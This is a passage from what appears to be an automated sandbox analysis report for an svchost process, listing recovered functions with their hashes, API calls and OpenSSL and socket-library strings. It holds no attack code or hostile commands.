                          • Instruction Fuzzy Hash: C042852AB0A78A96EB569F25E5203BA63A4FB42F84F084035DE8D47793DF3CF4548354
                          Function 00007FFDA5577EE0 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 292networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1731 7ffda5577ee0-7ffda5577f43 call 7ffda55bf210 call 7ffda5578740 1736 7ffda5577fb5-7ffda5577fbc 1731->1736 1737 7ffda5577f45-7ffda5577f65 call 7ffda557b240 1731->1737 1739 7ffda5578374-7ffda55783b3 call 7ffda55832a0 call 7ffda55d5780 1736->1739 1740 7ffda5577fc2-7ffda5577fc9 1736->1740 1748 7ffda5577f6b-7ffda5577fb0 _errno * 3 call 7ffda55ba280 call 7ffda55830a0 1737->1748 1749 7ffda5578009-7ffda5578017 1737->1749 1743 7ffda5578364-7ffda5578367 closesocket 1740->1743 1744 7ffda5577fcf-7ffda5577fda 1740->1744 1750 7ffda557836d 1743->1750 1745 7ffda557835f call 7ffda55a4360 1744->1745 1746 7ffda5577fe0-7ffda5578004 call 7ffda55a4360 call 7ffda55a4960 * 2 1744->1746 1745->1743 1746->1750 1748->1736 1754 7ffda5578019-7ffda5578045 setsockopt 1749->1754 1755 7ffda5578047 1749->1755 1750->1739 1760 7ffda557804e-7ffda557806a call 7ffda5583190 1754->1760 1755->1760 1767 7ffda5578071-7ffda5578075 1760->1767 1768 7ffda557806c-7ffda557806f 1760->1768 1769 7ffda55780da 1767->1769 1770 7ffda5578077-7ffda5578080 1767->1770 1768->1767 1768->1769 1773 7ffda55780dd-7ffda5578100 1769->1773 1772 7ffda5578082-7ffda55780ad setsockopt 1770->1772 1770->1773 1772->1773 1775 7ffda55780af-7ffda55780d8 WSAGetLastError call 7ffda55ba280 call 7ffda5583190 1772->1775 1777 7ffda5578102-7ffda5578121 call 7ffda55c7db0 1773->1777 1778 7ffda557813b-7ffda557813e 1773->1778 1775->1773 1793 7ffda5578123-7ffda557812d 1777->1793 1794 7ffda557812f-7ffda5578139 1777->1794 1779 7ffda5578192-7ffda557819d 1778->1779 1780 7ffda5578140-7ffda5578165 getsockopt 1778->1780 1785 7ffda5578283-7ffda557828b 1779->1785 1786 7ffda55781a3-7ffda55781aa 1779->1786 1783 7ffda5578171-7ffda557818c setsockopt 1780->1783 1784 7ffda5578167-7ffda557816f 1780->1784 1783->1779 1784->1779 1784->1783 1789 7ffda55782d1 1785->1789 1790 7ffda557828d-7ffda55782bb call 7ffda55a4960 * 2 1785->1790 1786->1785 1791 7ffda55781b0-7ffda55781de setsockopt 1786->1791 1799 7ffda55782d4-7ffda55782da 1789->1799 1822 7ffda55782c2-7ffda55782c5 1790->1822 1823 7ffda55782bd-7ffda55782c0 1790->1823 1796 7ffda55781f2-7ffda5578266 call 7ffda55c8020 * 2 WSAIoctl 1791->1796 1797 7ffda55781e0-7ffda55781ed WSAGetLastError 1791->1797 1793->1779 1794->1780 1796->1785 1820 7ffda5578268-7ffda557826e WSAGetLastError 1796->1820 1801 7ffda5578275-7ffda557827e call 7ffda5583190 1797->1801 1803 7ffda55782e1-7ffda5578305 call 7ffda559b960 call 7ffda55778b0 1799->1803 1804 7ffda55782dc-7ffda55782df 1799->1804 1801->1785 1806 7ffda557831a-7ffda5578337 call 7ffda55a8960 1803->1806 1821 7ffda5578307-7ffda557830a 1803->1821 1804->1803 1804->1806 1806->1739 1819 7ffda5578339-7ffda557835d call 7ffda55784b0 call 7ffda55bf210 1806->1819 1819->1739 1820->1801 1821->1736 1825 7ffda5578310-7ffda5578315 1821->1825 1822->1789 1826 7ffda55782c7-7ffda55782cc 1822->1826 1823->1799 1825->1736 1826->1736
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast_errnosetsockopt$CounterIoctlPerformanceQueryclosesocketgetsockopthtonsinet_ntop
                          • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %qd: errno %d$Failed to set SO_KEEPALIVE on fd %qd: errno %d$cf_socket_open() -> %d, fd=%qd$sa_addr inet_ntop() failed with errno %d: %s
                          • API String ID: 2614696814-935189632
                          • Opcode ID: 7b22c27c6eaf712f2131df2c9eab57348eab0c49bcdbf157eae59c86ed5bb559
                          • Instruction ID: 208123dd4b90ed6b19fe21104a3289dbb38e63bec07603a71b1cfbc3064bcde2
                          • Opcode Fuzzy Hash: 7b22c27c6eaf712f2131df2c9eab57348eab0c49bcdbf157eae59c86ed5bb559
                          • Instruction Fuzzy Hash: 96D1CD3AB0D68A96EB1ACF65E4643AE67A0FB46F84F404531DA4D43B96DF3CE044C708
                          Function 00007FFDA37959C0 Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 146COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$AttributesErrorFileLast
                          • String ID: could not get junction for "%s": %s
                          • API String ID: 3917093391-640641469
                          • Opcode ID: b275945d134fbdca25bfaa522fef7c4b1b215dbe53b10296cbeeaebf84d4fd8f
                          • Instruction ID: 96769f31d509f1446a1f284ec10a26067842206f90e938f7a577d6b359f5b9f8
                          • Opcode Fuzzy Hash: b275945d134fbdca25bfaa522fef7c4b1b215dbe53b10296cbeeaebf84d4fd8f
                          • Instruction Fuzzy Hash: 04619421B0E79296F7A09F20A86426977A2FB45774F404335DA6D23BE6CF3ED414C708
                          Function 00007FFDA3381310 Relevance: 31.8, APIs: 14, Strings: 4, Instructions: 345COMMON
                          Download Yara Rule
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA33813BB
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA33813D3
                          • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA33813F4
                          • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA338150F
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA3381527
                          • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA3381863
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA33A2E39), ref: 00007FFDA338187B
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_new$R_set_debug
                          • String ID: ossl_early_data_count_ok$ssl3_write_bytes$ssl\record\rec_layer_s3.c$tls_write_check_pending
                          • API String ID: 476316267-2399994965
                          • Opcode ID: f8178f680d83f3a347cd805ee141a041ec28e9a68a41335fa12e187e3285071d
                          • Instruction ID: 5d9302362da65ad9c0c7ed97468a46e3541651ed17a341aa3a4d584c50498497
                          • Opcode Fuzzy Hash: f8178f680d83f3a347cd805ee141a041ec28e9a68a41335fa12e187e3285071d
                          • Instruction Fuzzy Hash: 10E19E31F0EE8282EB50ABA5D4217B92292EF81B88F144531DE1D6B7D7DF3EE5858344
                          Function 00007FFDA5591AC0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 345COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: inet_pton$SimpleString::operator=inet_ntop
                          • String ID: .localhost$.onion$.onion.$127.0.0.1$::1$Hostname %s was found in DNS cache$Not resolving .onion address (RFC 7686)$localhost
                          • API String ID: 1960554822-2421204314
                          • Opcode ID: fb8889e82ae435d31b9017080458bc7e7dfa480ed605606885101f527b68be12
                          • Instruction ID: 6892ac36cc5930fc7c15100d6a92365deb2dc23324799bb05ae185dc7dfa2e86
                          • Opcode Fuzzy Hash: fb8889e82ae435d31b9017080458bc7e7dfa480ed605606885101f527b68be12
                          • Instruction Fuzzy Hash: 5FE1AD6AF0AA9A85EB168F7195603BC27B2EB47F88F444235DE1D07786DF3CE0458308
                          Function 00007FFDA55B6B40 Relevance: 24.2, APIs: 16, Instructions: 173networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: socket$acceptbindconnectgetsocknamehtonllistensendsetsockopt
                          • String ID:
                          • API String ID: 3053784475-0
                          • Opcode ID: edebabe36bea5bcd2954be1afe2cb4534247fba809b7458a7988c1750955324e
                          • Instruction ID: 752ee9b64bc27ebe8bd23b623bd108d15d7b9ae58e28e3330731f19fd7591b2b
                          • Opcode Fuzzy Hash: edebabe36bea5bcd2954be1afe2cb4534247fba809b7458a7988c1750955324e
                          • Instruction Fuzzy Hash: 61819E27B19A998AFB21DF64D4283FC2361BF46B68F410730DE6D06BD6EF3891468344
                          Function 00007FFDA3386A60 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLastO_test_flagsO_writeR_newR_set_debugR_vset_error
                          • String ID: ssl\record\methods\tls_common.c$tls_retry_write_records$tls_write_records
                          • API String ID: 1843479370-2458201149
                          • Opcode ID: 5a0e7b9a21a6a13af6988486327915390eef1c9b2d16b54942bd54142d920185
                          • Instruction ID: 8b4d29f3109ef8d37d1ce97b45eb11ddd77f47b7666984ff8eb01c6c30309a9d
                          • Opcode Fuzzy Hash: 5a0e7b9a21a6a13af6988486327915390eef1c9b2d16b54942bd54142d920185
                          • Instruction Fuzzy Hash: 5871A262B0EE5183E794AB66D5603B823A6FB84B44F140531CF1D63B96DF3BE4A1C308
                          Function 00007FFDA333E220 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free$M_freeM_move_peernameR_newR_set_debugR_set_errorX509_X509_freeX_free
                          • String ID: ossl_ssl_connection_reset$ssl\ssl_lib.c
                          • API String ID: 1979470287-3605862542
                          • Opcode ID: 64869083f6447652d00b06199bb98fb12f1af2d577d0d16ad5931df5c3789ef0
                          • Instruction ID: b93b2d087dd9259f338fc1fd85b9c37158102fe182a0ac0a8a13d4a0ba17699c
                          • Opcode Fuzzy Hash: 64869083f6447652d00b06199bb98fb12f1af2d577d0d16ad5931df5c3789ef0
                          • Instruction Fuzzy Hash: BB519F32B0EB8281E750FF26D4602AD73A5FF84B98F084136DA4D5B7AACF39D4418714
                          Function 00007FFDA3388B90 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388BB4
                          • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388BBD
                          • BIO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388BC6
                          • CRYPTO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388BDF
                          • EVP_CIPHER_CTX_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388C05
                          • EVP_MD_CTX_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388C11
                          • OPENSSL_cleanse.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388C35
                          • CRYPTO_free.LIBCRYPTO-3-X64(-0000001F,00007FFDA33869C0,?,00007FFDA3382462), ref: 00007FFDA3388C60
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free$X_free$L_cleanse
                          • String ID: ssl\record\methods\tls_common.c
                          • API String ID: 3857070794-847517130
                          • Opcode ID: 8d2159bac57eb334fd317ca3dc97f6b5d03ccc3f7ccdcc6aaa2a60c1a2b936cf
                          • Instruction ID: 9e6ed4307f79917a18f7224aef74031d0fde2306f53aedf73ae73dc0c5fd468a
                          • Opcode Fuzzy Hash: 8d2159bac57eb334fd317ca3dc97f6b5d03ccc3f7ccdcc6aaa2a60c1a2b936cf
                          • Instruction Fuzzy Hash: D1213232F1EE9186EA14FB21E8642E96366EF84B80F044431EB9E53797DE3EE551C704
                          Function 00007FFDA3332F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3332F7F
                          • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3332F97
                          • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3332FA8
                          • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3332FE7
                          • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3333012
                          • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA333303B
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: D_run_once$R_newR_set_debugR_set_error
                          • String ID: OPENSSL_init_ssl$ssl\ssl_init.c
                          • API String ID: 3879570137-538246785
                          • Opcode ID: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                          • Instruction ID: 95601269a0b782d2643d91e9fb3c1ebd4eb6f7769c5eb4c9ffeb5b5e8d767b90
                          • Opcode Fuzzy Hash: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                          • Instruction Fuzzy Hash: 5A314361F0E90386FB44B715E8717B56293EF94380F549435E80EA23A7DE2FE945C708
                          Function 00007FFD942F71F0 Relevance: 13.8, APIs: 9, Instructions: 282fileCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                          • String ID:
                          • API String ID: 1617910340-0
                          • Opcode ID: c58fbda7aea8831e34ac238b45014ac4bd6a023c821147c20068f492f0d5de91
                          • Instruction ID: 014432d100be14540e4ba3cd63f2f9e14527c07d8ec5f807e8a363f86072f3d2
                          • Opcode Fuzzy Hash: c58fbda7aea8831e34ac238b45014ac4bd6a023c821147c20068f492f0d5de91
                          • Instruction Fuzzy Hash: 83C19132B28A4186EB60DFA4C4A02AC3771FB8AB94F509325DE1E97796DF39E451C700
                          Function 00007FFDA3389730 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free$O_mallocR_newR_set_debug
                          • String ID: ssl\record\methods\tls_common.c$tls_setup_write_buffer
                          • API String ID: 681801835-438346174
                          • Opcode ID: 468ba72a43a4c0d3d1ca5aa109d9efe1429000385757ab171fc09a78996c4a09
                          • Instruction ID: efa0a2c42c60e8f362346632f8aa1f2dfbcc67b536a09cc69601528fa16deee5
                          • Opcode Fuzzy Hash: 468ba72a43a4c0d3d1ca5aa109d9efe1429000385757ab171fc09a78996c4a09
                          • Instruction Fuzzy Hash: D951D232F0EF5187EB10BF51E9502A963A6FB44B88F180431DE4D27B86DE3AE656C304
                          Function 00007FFDA332D360 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_zalloc$O_free
                          • String ID: ssl\ssl_cert.c
                          • API String ID: 1411191933-188639428
                          • Opcode ID: dfaeb06e57066b1833371b19c771e489e53a8360702d172523822accf1e30447
                          • Instruction ID: 337031528b21b9107ceea3c6b4e74e629b22e2a2b188805b9d70808122716578
                          • Opcode Fuzzy Hash: dfaeb06e57066b1833371b19c771e489e53a8360702d172523822accf1e30447
                          • Instruction Fuzzy Hash: 1A115872B1AB4285EB81EF15E4643A832A1FB08784F484035CA4D0739AEF7EE594C709
                          Function 00007FFDA3337360 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                          • CRYPTO_free_ex_data.LIBCRYPTO-3-X64(?,00007FFDA3367F02,?,00007FFDA3363609), ref: 00007FFDA333738E
                          • CRYPTO_THREAD_lock_free.LIBCRYPTO-3-X64(?,00007FFDA3367F02,?,00007FFDA3363609), ref: 00007FFDA33373AF
                          • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFDA3367F02,?,00007FFDA3363609), ref: 00007FFDA33373C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: D_lock_freeO_freeO_free_ex_data
                          • String ID: ssl\ssl_lib.c
                          • API String ID: 1442806380-1984206432
                          • Opcode ID: 68dbc8c7bb9ebcc90587d23e049a21a5d4f55a4649e8addeef594cf45cb7a532
                          • Instruction ID: e53b1d9b3d647847fd19ac105a22ec5578698dc221cc53119958fdd5823e36b9
                          • Opcode Fuzzy Hash: 68dbc8c7bb9ebcc90587d23e049a21a5d4f55a4649e8addeef594cf45cb7a532
                          • Instruction Fuzzy Hash: DEF06261F0FE4242EA58BB7998711781312EF44B60F045535ED0E563E3DE2FD8418288
                          Function 00007FFDA3779330 Relevance: 63.9, APIs: 51, Instructions: 174COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 9186718d952aa99ffdd076691540635cd7a8686958ebc2398125b42f5949b570
                          • Instruction ID: 0e6299b46625afe97c53203d844f0ba837f0b47103a1ebb996a4405c663eb250
                          • Opcode Fuzzy Hash: 9186718d952aa99ffdd076691540635cd7a8686958ebc2398125b42f5949b570
                          • Instruction Fuzzy Hash: 46A14636A1AA8596EB809F21D8642BD3721FB8DF95F080731CE4E57366CF39D499C314
                          Function 00007FFDA33819B0 Relevance: 63.5, APIs: 24, Strings: 12, Instructions: 522COMMON
                          Download Yara Rule

